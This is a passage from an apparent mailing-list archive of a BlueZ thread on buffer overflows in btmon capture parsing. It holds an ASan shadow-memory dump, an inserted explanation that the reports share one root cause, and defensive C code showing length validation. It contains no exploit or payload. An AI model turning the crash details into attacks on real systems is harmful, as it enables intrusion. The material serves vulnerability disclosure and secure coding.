>> 0x0e7f1b0ef280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> =>0x0e7f1b0ef290: 00 00 00 00 00 00 00 00[02]f4 f3 f3 f3 f3 00 00
>> 0x0e7f1b0ef2a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
>> 0x0e7f1b0ef2b0: f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef2c0: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef2d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef2e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> Shadow byte legend (one shadow byte represents 8 application bytes):
>> Addressable: 00
>> Partially addressable: 01 02 03 04 05 06 07
>> Heap left redzone: fa
>> Heap right redzone: fb
>> Freed heap region: fd
>> Stack left redzone: f1
>> Stack mid redzone: f2
>> Stack right redzone: f3
>> Stack partial redzone: f4
>> Stack after return: f5
>> Stack use after scope: f8
>> Global redzone: f9
>> Global init order: f6
>> Poisoned by user: f7
>> Contiguous container OOB:fc
>> ASan internal: fe
>> ==1986==ABORTING
>
>
^ permalink raw reply [flat|nested] 8+ messages in thread
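The four reports quoted in this thread share one root cause: a length field taken from the capture file (the record length handed to read() in pklg_read_hci, the L2CAP length that sizes the fragment malloc() while memcpy() copies the frame's own size, the dlen that bounds the packet_hexdump loop, the field length handed to print_hex_field) is trusted without being checked against the bytes actually present, so the 1490-byte 'buf' in control_reader ([288, 1778) in the ASan frames) is overrun; the pklg case shows it most directly as a 1491-byte WRITE. The C block below is an added illustration, not BlueZ code and not a patch from anyone in the thread; the two-byte record format, BUF_SIZE, and the function and struct names are constructed for the example, and each function refuses the record rather than clamping silently where the declared length cannot be satisfied.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for the fixed stack buffer in the quoted ASan
 * frames ([288, 1778) 'buf' is 1490 bytes); not a BlueZ constant. */
#define BUF_SIZE 1490

/* Pattern 1 (cf. pklg_read_hci): a record length taken from the capture
 * header drives a read into a fixed buffer. The "capture" here is an
 * in-memory byte array with a constructed 2-byte little-endian length
 * prefix per record. Returns the record length, or -1 when the declared
 * length exceeds the destination or the bytes left in the capture; on
 * rejection nothing is copied and *pos is left untouched. */
long read_record(const uint8_t *cap, size_t cap_len, size_t *pos,
                 uint8_t *dst, size_t dst_size)
{
    if (*pos > cap_len || cap_len - *pos < 2)
        return -1;                          /* truncated header */
    size_t declared = cap[*pos] | (cap[*pos + 1] << 8);
    size_t remaining = cap_len - *pos - 2;
    if (declared > dst_size || declared > remaining)
        return -1;                          /* would overflow dst or run off the file */
    memcpy(dst, cap + *pos + 2, declared);
    *pos += 2 + declared;
    return (long)declared;
}

/* Pattern 2 (cf. the l2cap_packet fragment start): the buffer is sized
 * from the L2CAP header's total length, but the copy is sized from the
 * bytes present in this ACL frame, so the copy must never exceed the
 * allocation. Returns false without allocating when it would. */
struct frag {
    uint8_t *buf;   /* reassembly buffer of 'len' bytes */
    size_t pos;     /* bytes received so far */
    size_t left;    /* bytes still expected */
};

bool frag_start(struct frag *f, const uint8_t *data, size_t size, size_t len)
{
    if (size > len)
        return false;                       /* more bytes than the declared total */
    f->buf = malloc(len);
    if (!f->buf)
        return false;
    memcpy(f->buf, data, size);
    f->pos = size;
    f->left = len - size;
    return true;
}

/* Pattern 3 (cf. packet_hexdump / print_hex_field): a dump loop indexed
 * by a header-declared length is clamped to the bytes actually available
 * and to the output buffer. Writes "xx xx ... " into out, NUL-terminated,
 * and returns the number of input bytes dumped. */
size_t hexdump_checked(const uint8_t *buf, size_t avail, size_t declared,
                       char *out, size_t out_size)
{
    static const char hexdigits[] = "0123456789abcdef";
    size_t n = declared < avail ? declared : avail;
    if (out_size == 0)
        return 0;
    if (n > (out_size - 1) / 3)
        n = (out_size - 1) / 3;             /* 3 chars per byte plus the NUL */
    for (size_t i = 0; i < n; i++) {
        out[i * 3 + 0] = hexdigits[buf[i] >> 4];
        out[i * 3 + 1] = hexdigits[buf[i] & 0xf];
        out[i * 3 + 2] = ' ';
    }
    out[n * 3] = '\0';
    return n;
}

int main(void)
{
    /* Constructed capture: one 4-byte record, then a record claiming
     * 0xffff bytes that neither the capture nor 'buf' can hold. */
    static const uint8_t cap[] = { 0x04, 0x00, 0x02, 0x0c, 0x04, 0x00,
                                   0xff, 0xff, 0x01, 0x02 };
    uint8_t buf[BUF_SIZE];
    size_t pos = 0;
    char out[64];
    struct frag f;

    printf("record 1: %ld bytes\n", read_record(cap, sizeof cap, &pos, buf, sizeof buf));
    printf("record 2: %ld (rejected)\n", read_record(cap, sizeof cap, &pos, buf, sizeof buf));
    printf("fragment with size 12 > len 4 accepted: %s\n",
           frag_start(&f, buf, 12, 4) ? "yes" : "no");
    printf("dumped %zu of declared 2304 bytes: %s\n",
           hexdump_checked(buf, 4, 2304, out, sizeof out), out);
    return 0;
}
```

The declared-versus-available check belongs at the point where the length leaves the file format and enters the code that indexes memory; once a fragment buffer or a stack array has been sized from one length and filled from another, every later consumer inherits the mismatch, which is why the same control_reader frame shows up in all four traces.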
Thread overview: 8+ messages
2016-11-14 17:06 multiple buffer overflows and out-of-bound reads op7ic \x00
2016-11-15 9:18 ` Luiz Augusto von Dentz
2016-11-15 9:25 ` op7ic \x00
2016-11-15 10:41 ` François Beaufort
2016-11-15 10:51 ` op7ic \x00
2016-11-15 11:51 ` op7ic \x00
2016-11-15 12:01 ` Johan Hedberg
2016-11-15 12:12 ` op7ic \x00